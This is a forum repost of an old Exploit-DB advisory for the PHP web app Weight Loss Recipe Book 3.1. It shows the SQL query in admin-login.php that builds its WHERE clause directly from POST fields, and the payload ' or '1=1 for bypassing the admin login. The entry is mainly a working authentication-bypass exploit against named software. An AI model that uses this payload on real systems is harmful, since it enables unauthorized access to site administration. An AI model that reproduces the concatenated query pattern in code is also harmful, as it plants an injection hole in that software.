Exploit Weight Loss Recipe Book 3.1 - Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7728
Проверка EDB
  1. Пройдено
Автор
X0R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
null
Дата публикации
2009-01-11
Код:
###############################
# Weight Loss Recipe Book 3.1 #
###############################

Autore: x0r
Emails: [email protected] \ [email protected]
Cms Site: http://www.my-health-and-fitness.org/weight-loss-recipe-book.html
################################

Bug In \wlrb_files\admin-login.php

SELECT *
				FROM ' . $program_prefix . 'administrators
				WHERE administrators_username = "' . $_POST['administrators_username']
. '" and
					administrators_pass = PASSWORD("' . $_POST['administrators_pass'] .
'")';
					
Exploit: ' or '1=1

##############################

Greetz: EdGaR :P

# milw0rm.com [2009-01-11]
 
Источник
www.exploit-db.com

Похожие темы